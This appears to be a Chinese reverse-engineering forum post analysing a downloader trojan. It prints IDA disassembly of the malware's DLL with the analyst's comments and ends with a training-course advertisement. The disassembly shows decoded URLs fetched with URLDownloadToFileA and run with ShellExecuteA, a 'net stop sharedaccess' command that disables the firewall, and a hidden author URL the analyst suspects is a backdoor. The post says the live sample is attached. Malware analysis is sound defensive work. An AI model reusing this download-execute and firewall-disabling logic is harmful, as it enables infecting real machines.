unpacked:004011A6 push 40h
unpacked:004011A8 mov [ebp+var_28], eax
unpacked:004011AB pop esi
unpacked:004011AC lea eax, [ebp+var_3C]
unpacked:004011AF push eax
unpacked:004011B0 mov [ebp+var_3C], 3Ch
unpacked:004011B7 mov [ebp+var_30], offset Operation ; "open"
unpacked:004011BE mov [ebp+var_38], esi
unpacked:004011C1 call ShellExecuteEx
unpacked:004011C7 test eax, eax
unpacked:004011C9 jz short loc_4011F4
unpacked:004011CB push esi ; dwPriorityClass
unpacked:004011CC mov esi, SetPriorityClass
unpacked:004011D2 push [ebp+hProcess] ; hProcess
unpacked:004011D5 call esi ; SetPriorityClass
unpacked:004011D7 push 100h ; dwPriorityClass
unpacked:004011DC call GetCurrentProcess
unpacked:004011E2 push eax ; hProcess
unpacked:004011E3 call esi ; SetPriorityClass
unpacked:004011E5 push 0Fh ; nPriority
unpacked:004011E7 call GetCurrentThread
unpacked:004011ED push eax ; hThread
unpacked:004011EE call SetThreadPriority
... ...
////释放出的dll分析:
dll中没什么代码, 只是简单地从自身文件尾读取配置信息, 并按照配置信息执行以下就完了, 不过比较有意思的是,
好像作者在dll中安置了一个貌似是后门的东西. 这作者人品也...
dll主要代码如下:
.text:100011E9 lea eax, [esp+658h+FileName]
.text:100011F0 push eax ; lpBuffer
.text:100011F1 call ds:GetWindowsDirectoryA ; 这里读取dll自身.
.text:100011F7 mov edi, offset aSystem32Ilovex ; "\\system32\\ilovexd.dll"
.text:100011FC or ecx, 0FFFFFFFFh
.text:100011FF xor eax, eax
.text:10001201 lea edx, [esp+654h+FileName]
.text:10001208 repne scasb
.text:1000120A not ecx
.text:1000120C sub edi, ecx
.text:1000120E push offset Mode ; "rb"
.text:10001213 mov esi, edi
.text:10001215 mov ebx, ecx
.text:10001217 mov edi, edx
.text:10001219 or ecx, 0FFFFFFFFh
.text:1000121C repne scasb
.text:1000121E mov ecx, ebx
.text:10001220 dec edi
.text:10001221 shr ecx, 2
.text:10001224 rep movsd
.text:10001226 mov ecx, ebx
.text:10001228 lea eax, [esp+658h+FileName]
.text:1000122F and ecx, 3
.text:10001232 push eax ; Filename
.text:10001233 rep movsb
.text:10001235 call ds:fopen ; 打开dll自身,读取配置信息.
.text:1000123B mov esi, eax
.text:1000123D add esp, 8
.text:10001240 test esi, esi
.text:10001242 jnz short loc_1000125D
.text:10001244 push offset aOpenDllFailed_ ; "open dll failed..."
.text:10001249 call ds:OutputDebugStringA
.text:1000124F pop edi
.text:10001250 pop esi
.text:10001251 xor eax, eax
.text:10001253 pop ebx
.text:10001254 add esp, 648h
.text:1000125A retn 4
.text:1000125D ; ---------------------------------------------------------------------------
.text:1000125D
.text:1000125D loc_1000125D: ; CODE XREF: StartAddress+82j
.text:1000125D mov edi, ds:fseek
.text:10001263 push 2 ; Origin
.text:10001265 push 0FFFFFF82h ; Offset
.text:10001267 push esi ; File
.text:10001268 call edi ; fseek
.text:1000126A mov ebx, ds:fread
.text:10001270 push esi ; File
.text:10001271 push 1 ; Count
.text:10001273 lea ecx, [esp+668h+DstBuf]
.text:10001277 push 1 ; ElementSize
.text:10001279 push ecx ; DstBuf
.text:1000127A call ebx ; fread
.text:1000127C mov al, [esp+670h+DstBuf]
.text:10001280 xor edx, edx
.text:10001282 cmp al, 59h
.text:10001284 push 2 ; Origin
.text:10001286 setz dl
.text:10001289 push 0FFFFFF83h ; Offset
.text:1000128B push esi ; File
.text:1000128C mov dword_10003178, edx
.text:10001292 call edi ; fseek
.text:10001294 push esi ; File
.text:10001295 push 1 ; Count
.text:10001297 lea eax, [esp+684h+DstBuf]
.text:1000129B push 1 ; ElementSize
.text:1000129D push eax ; DstBuf
.text:1000129E call ebx ; fread
.text:100012A0 mov al, [esp+68Ch+DstBuf]
.text:100012A4 xor ecx, ecx
.text:100012A6 cmp al, 59h
.text:100012A8 push 2 ; Origin
.text:100012AA setz cl
.text:100012AD push 0FFFFFF85h ; Offset
.text:100012AF push esi ; File
.text:100012B0 mov dword_10003174, ecx
.text:100012B6 call edi ; fseek
.text:100012B8 add esp, 44h
.text:100012BB lea edx, [esp+654h+DstBuf]
.text:100012BF push esi ; File
.text:100012C0 push 1 ; Count
.text:100012C2 push 1 ; ElementSize
.text:100012C4 push edx ; DstBuf
.text:100012C5 call ebx ; fread
.text:100012C7 mov dl, [esp+664h+DstBuf]
.text:100012CB xor eax, eax
.text:100012CD cmp dl, 59h
.text:100012D0 push 2 ; Origin
.text:100012D2 setz al
.text:100012D5 push 0FFFFFF86h ; Offset
.text:100012D7 push esi ; File
.text:100012D8 mov dword_10003170, eax
.text:100012DD call edi ; fseek
.text:100012DF push esi ; File
.text:100012E0 push 1 ; Count
.text:100012E2 push 64h ; ElementSize
.text:100012E4 push offset byte_10003564 ; DstBuf
.text:100012E9 call ebx ; fread
.text:100012EB push esi ; File
.text:100012EC call ds:fclose
.text:100012F2 mov eax, dword_10003170
.text:100012F7 add esp, 30h
.text:100012FA test eax, eax
.text:100012FC jz loc_10001521
.text:10001302 push 63h
.text:10001304 push offset byte_10003564
.text:10001309 call URL_Decode
.text:1000130E add esp, 8
.text:10001311 push 0 ; LPBINDSTATUSCALLBACK
.text:10001313 push 0 ; DWORD
.text:10001315 push offset FileName ; "C:\\Progra~1\\url.txt"
.text:1000131A push offset byte_10003564 ; LPCSTR
.text:1000131F push 0 ; LPUNKNOWN
.text:10001321 call URLDownloadToFileA
.text:10001326 push offset FileName ; "C:\\Progra~1\\url.txt"
.text:1000132B call ds:GetFileAttributesA
.text:10001331 cmp eax, 0FFFFFFFFh
.text:10001334 jnz short loc_1000134F
.text:10001336 push offset aDown_exeInvali ; "down.exe:invalid url or empty page, ple"...
.text:1000133B call ds:OutputDebugStringA
.text:10001341 pop edi
.text:10001342 pop esi
.text:10001343 xor eax, eax
.text:10001345 pop ebx
.text:10001346 add esp, 648h
.text:1000134C retn 4
.text:1000134F ; ---------------------------------------------------------------------------
.text:1000134F
.text:1000134F loc_1000134F: ; CODE XREF: StartAddress+174j
.text:1000134F mov ecx, 18h
.text:10001354 xor eax, eax
.text:10001356 lea edi, [esp+654h+var_44B]
.text:1000135D mov [esp+654h+String1], 0
.text:10001365 rep stosd
.text:10001367 stosw
.text:10001369 push ebp
.text:1000136A push offset aR ; "r+"
.text:1000136F push offset FileName ; "C:\\Progra~1\\url.txt"
.text:10001374 xor ebp, ebp
.text:10001376 mov [esp+660h+var_644], 3E8h
.text:1000137E stosb
.text:1000137F call ds:fopen ; 打开下载下来的地址表url.txt
.text:10001385 mov esi, eax
.text:10001387 add esp, 8
.text:1000138A test esi, esi
.text:1000138C mov [esp+658h+var_63C], esi
.text:10001390 jz loc_1000146B
.text:10001396 mov ecx, 0F9h
.text:1000139B xor eax, eax
.text:1000139D lea edi, [esp+658h+var_3E7]
.text:100013A4 mov [esp+658h+String2], 0
.text:100013AC rep stosd
.text:100013AE stosw
.text:100013B0 push esi ; File
.text:100013B1 push 1 ; Count
.text:100013B3 lea ecx, [esp+660h+String2]
.text:100013BA push 3E8h ; ElementSize
.text:100013BF push ecx ; DstBuf
.text:100013C0 stosb
.text:100013C1 call ebx ; fread ; 读出N多地址, 下面是循环分析出每一个地址.
.text:100013C3 add esp, 10h
.text:100013C6 mov [esp+658h+var_640], offset unk_1000317C
.text:100013CE
.text:100013CE loc_100013CE: ; CODE XREF: StartAddress+290j
.text:100013CE cmp [esp+ebp+658h+String2], 0Ah
.text:100013D6 jnz short loc_10001449
.text:100013D8 lea ebx, [ebp+1]
.text:100013DB lea edx, [esp+658h+String2]
.text:100013E2 push ebx ; iMaxLength
.text:100013E3 lea eax, [esp+65Ch+String1]
.text:100013EA push edx ; lpString2
.text:100013EB push eax ; lpString1
.text:100013EC call ds:lstrcpynA
.text:100013F2 lea edi, [esp+658h+String1]
.text:100013F9 or ecx, 0FFFFFFFFh
.text:100013FC xor eax, eax
.text:100013FE push ebx
.text:100013FF repne scasb
.text:10001401 not ecx
.text:10001403 sub edi, ecx
.text:10001405 lea eax, [esp+65Ch+String2]
.text:1000140C mov edx, ecx
.text:1000140E mov esi, edi
.text:10001410 mov edi, [esp+65Ch+var_640]
.text:10001414 push eax
.text:10001415 shr ecx, 2
.text:10001418 rep movsd
.text:1000141A mov ecx, edx
.text:1000141C and ecx, 3
.text:1000141F rep movsb
.text:10001421 call sub_10001060
.text:10001426 mov edx, [esp+660h+var_644]
.text:1000142A mov eax, [esp+660h+var_640]
.text:1000142E mov esi, [esp+660h+var_63C]
.text:10001432 or ecx, 0FFFFFFFFh
.text:10001435 sub ecx, ebp
.text:10001437 add esp, 8
.text:1000143A add edx, ecx
.text:1000143C xor ebp, ebp
.text:1000143E add eax, 64h
.text:10001441 mov [esp+658h+var_644], edx
.text:10001445 mov [esp+658h+var_640], eax
.text:10001449
.text:10001449 loc_10001449: ; CODE XREF: StartAddress+216j
.text:10001449 mov eax, [esp+658h+var_644]
.text:1000144D inc ebp
.text:1000144E cmp ebp, eax
.text:10001450 jl loc_100013CE
.text:10001456 push esi ; File
.text:10001457 call ds:fclose
.text:1000145D add esp, 4
.text:10001460 push offset FileName ; "C:\\Progra~1\\url.txt"
.text:10001465 call ds:DeleteFileA
.text:1000146B
.text:1000146B loc_1000146B: ; CODE XREF: StartAddress+1D0j
.text:1000146B mov ebx, ds:CreateThread ; 这个标签就是直接下载exe文件执行. 可以看出这款下载器有两种模式,
.text:1000146B ; 一种是直接下载exe执行,一种是下载地址表解析出地址执行.
.text:10001471 mov ecx, 13h
.text:10001476 xor eax, eax
.text:10001478 lea edi, [esp+658h+var_600]
.text:1000147C mov [esp+658h+var_604], 0
.text:10001484 lea ebp, [esp+658h+var_604]
.text:10001488 rep stosd
.text:1000148A mov edi, offset unk_1000317C
.text:1000148F
.text:1000148F loc_1000148F: ; CODE XREF: StartAddress+32Aj
.text:1000148F mov esi, offset unk_100035C8
.text:10001494 mov eax, edi
.text:10001496
.text:10001496 loc_10001496: ; CODE XREF: StartAddress+2F4j
.text:10001496 mov dl, [eax]
.text:10001498 mov cl, dl
.text:1000149A cmp dl, [esi]
.text:1000149C jnz short loc_100014BA
.text:1000149E test cl, cl
.text:100014A0 jz short loc_100014B6
.text:100014A2 mov dl, [eax+1]
.text:100014A5 mov cl, dl
.text:100014A7 cmp dl, [esi+1]
.text:100014AA jnz short loc_100014BA
.text:100014AC add eax, 2
.text:100014AF add esi, 2
.text:100014B2 test cl, cl
.text:100014B4 jnz short loc_10001496
.text:100014B6
.text:100014B6 loc_100014B6: ; CODE XREF: StartAddress+2E0j
.text:100014B6 xor eax, eax
.text:100014B8 jmp short loc_100014BF
.text:100014BA ; ---------------------------------------------------------------------------
.text:100014BA
.text:100014BA loc_100014BA: ; CODE XREF: StartAddress+2DCj
.text:100014BA ; StartAddress+2EAj
.text:100014BA sbb eax, eax
.text:100014BC sbb eax, 0FFFFFFFFh
.text:100014BF
.text:100014BF loc_100014BF: ; CODE XREF: StartAddress+2F8j
.text:100014BF test eax, eax
.text:100014C1 jz short loc_100014DE
.text:100014C3 push 0 ; lpThreadId
.text:100014C5 push 0 ; dwCreationFlags
.text:100014C7 push edi ; lpParameter
.text:100014C8 push offset sub_100010A0 ; lpStartAddress
.text:100014CD push 0 ; dwStackSize
.text:100014CF push 0 ; lpThreadAttributes
.text:100014D1 call ebx ; CreateThread
.text:100014D3 push 63h ; dwMilliseconds
.text:100014D5 mov [ebp+0], eax
.text:100014D8 call ds:Sleep
.text:100014DE
.text:100014DE loc_100014DE: ; CODE XREF: StartAddress+301j
.text:100014DE add edi, 64h
.text:100014E1 add ebp, 4
.text:100014E4 cmp edi, 1000394Ch
.text:100014EA jl short loc_1000148F
.text:100014EC mov ebx, ds:WaitForSingleObject
.text:100014F2 mov ebp, ds:CloseHandle
.text:100014F8 lea edi, [esp+658h+var_604]
.text:100014FC mov [esp+658h+var_644], 14h
.text:10001504
.text:10001504 loc_10001504: ; CODE XREF: StartAddress+35Ej
.text:10001504 mov esi, [edi]
.text:10001506 test esi, esi
.text:10001508 jz short loc_10001512
.text:1000150A push 0FFFFFFFFh ; dwMilliseconds
.text:1000150C push esi ; hHandle
.text:1000150D call ebx ; WaitForSingleObject
.text:1000150F push esi ; hObject
.text:10001510 call ebp ; CloseHandle
.text:10001512
.text:10001512 loc_10001512: ; CODE XREF: StartAddress+348j
.text:10001512 mov eax, [esp+658h+var_644]
.text:10001516 add edi, 4
.text:10001519 dec eax
.text:1000151A mov [esp+658h+var_644], eax
.text:1000151E jnz short loc_10001504
.text:10001520 pop ebp
.text:10001521
.text:10001521 loc_10001521: ; CODE XREF: StartAddress+13Cj
.text:10001521 mov eax, dword_10003174
.text:10001526 test eax, eax
.text:10001528 jz short loc_10001537
.text:1000152A push 0 ; uCmdShow
.text:1000152C push offset CmdLine ; "net stop sharedaccess"
.text:10001531 call ds:WinExec
.text:10001537
.text:10001537 loc_10001537: ; CODE XREF: StartAddress+368j
.text:10001537 mov ecx, 41h
.text:1000153C xor eax, eax
.text:1000153E lea edi, [esp+654h+FileName]
.text:10001545 push 104h ; uSize
.text:1000154A rep stosd
.text:1000154C lea eax, [esp+658h+FileName]
.text:10001553 push eax ; lpBuffer
.text:10001554 call ds:GetWindowsDirectoryA
.text:1000155A mov edi, offset aTempIlovexd_ex ; "\\temp\\ilovexd.exe"
.text:1000155F or ecx, 0FFFFFFFFh
.text:10001562 xor eax, eax
.text:10001564 lea edx, [esp+654h+FileName]
.text:1000156B repne scasb
.text:1000156D not ecx
.text:1000156F sub edi, ecx
.text:10001571 push 63h
.text:10001573 mov esi, edi
.text:10001575 mov ebx, ecx
.text:10001577 mov edi, edx
.text:10001579 or ecx, 0FFFFFFFFh
.text:1000157C repne scasb
.text:1000157E mov ecx, ebx
.text:10001580 dec edi
.text:10001581 shr ecx, 2
.text:10001584 rep movsd
.text:10001586 mov ecx, ebx
.text:10001588 push offset byte_10003564
.text:1000158D and ecx, 3
.text:10001590 rep movsb
.text:10001592 call URL_Decode ; url解密.
.text:10001597 add esp, 8
.text:1000159A lea eax, [esp+654h+FileName]
.text:100015A1 push 0 ; LPBINDSTATUSCALLBACK
.text:100015A3 push 0 ; DWORD
.text:100015A5 push eax ; LPCSTR
.text:100015A6 push offset byte_10003564 ; LPCSTR
.text:100015AB push 0 ; LPUNKNOWN
.text:100015AD call URLDownloadToFileA
.text:100015B2 lea ecx, [esp+654h+FileName]
.text:100015B9 push ecx ; lpFileName
.text:100015BA call ds:GetFileAttributesA
.text:100015C0 cmp eax, 0FFFFFFFFh
.text:100015C3 jnz short loc_100015DE
.text:100015C5 push offset aDllDownloadFai ; "dll:download failed... check url.."
.text:100015CA call ds:OutputDebugStringA
.text:100015D0 pop edi
.text:100015D1 pop esi
.text:100015D2 xor eax, eax
.text:100015D4 pop ebx
.text:100015D5 add esp, 648h
.text:100015DB retn 4
.text:100015DE ; ---------------------------------------------------------------------------
.text:100015DE
.text:100015DE loc_100015DE: ; CODE XREF: StartAddress+403j
.text:100015DE mov ebx, ds:ShellExecuteA
.text:100015E4 push 0 ; nShowCmd
.text:100015E6 push 0 ; lpDirectory
.text:100015E8 lea edx, [esp+65Ch+FileName]
.text:100015EF push 0 ; lpParameters
.text:100015F1 push edx ; lpFile
.text:100015F2 push offset Operation ; "open"
.text:100015F7 push 0 ; hwnd
.text:100015F9 call ebx ; ShellExecuteA
.text:100015FB mov ecx, 8
.text:10001600 mov esi, offset a?QG0fccciekl7r ; "?$%*q}~'()?FCCC塃K?R嶸I=>N?朠NR"
.text:10001605 lea edi, [esp+654h+en_url] ; 这个单独的url很奇怪,每个配出来下载者在最后都会去下
.text:10001605 ; 载这个地址上的东西并执行(我用OD解过这个字符串,是个
.text:10001605 ; exe的地址,不过已经失效). 不知道是用于什么目的的,
.text:10001605 ; 更新? 统计? 还是后门 ?因为这些地址全部失效现在也
.text:10001605 ; 无法得知了.
.text:10001609 xor eax, eax
.text:1000160B rep movsd
.text:1000160D movsw
.text:1000160F mov ecx, 6
.text:10001614 mov esi, offset aCProgra1Ojhnjk ; "C:\\Progra~1\\OJhnjksLC.exe"
.text:10001619 lea edi, [esp+654h+save_path.]
.text:10001620 mov [esp+654h+var_616], eax
.text:10001624 rep movsd
.text:10001626 mov [esp+654h+var_612], eax
.text:1000162A mov ecx, 12h
.text:1000162F movsw
.text:10001631 mov [esp+654h+var_60E], eax
.text:10001635 lea edi, [esp+654h+var_496]
.text:1000163C mov [esp+654h+var_60A], eax
.text:10001640 push 57h
.text:10001642 rep stosd
.text:10001644 lea ecx, [esp+658h+en_url]
.text:10001648 push ecx
.text:10001649 stosw
.text:1000164B call URL_Decode ; 对作者自己的url解密.
.text:10001650 add esp, 8
.text:10001653 lea edx, [esp+654h+save_path.]
.text:1000165A lea eax, [esp+654h+en_url]
.text:1000165E push 0 ; LPBINDSTATUSCALLBACK
.text:10001660 push 0 ; DWORD
.text:10001662 push edx ; LPCSTR
.text:10001663 push eax ; LPCSTR
.text:10001664 push 0 ; LPUNKNOWN
.text:10001666 call URLDownloadToFileA
.text:1000166B push 0 ; nShowCmd
.text:1000166D push 0 ; lpDirectory
.text:1000166F lea ecx, [esp+65Ch+save_path.]
.text:10001676 push 0 ; lpParameters
.text:10001678 push ecx ; lpFile
.text:10001679 push offset Operation ; "open"
.text:1000167E push 0 ; hwnd
.text:10001680 call ebx ; ShellExecuteA
.text:10001682 pop edi
.text:10001683 pop esi
.text:10001684 mov eax, 1
.text:10001689 pop ebx
.text:1000168A add esp, 648h
.text:10001690 retn 4
.text:10001690 StartAddress endp
.text:10001690
好了, 就分析到这里吧 . 希望对新入门的菜鸟朋友有些帮助 .
附件中分别为exe和dll的idb文件及病毒样本(因含有驱动,若动态调试请在虚拟机中进行).
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)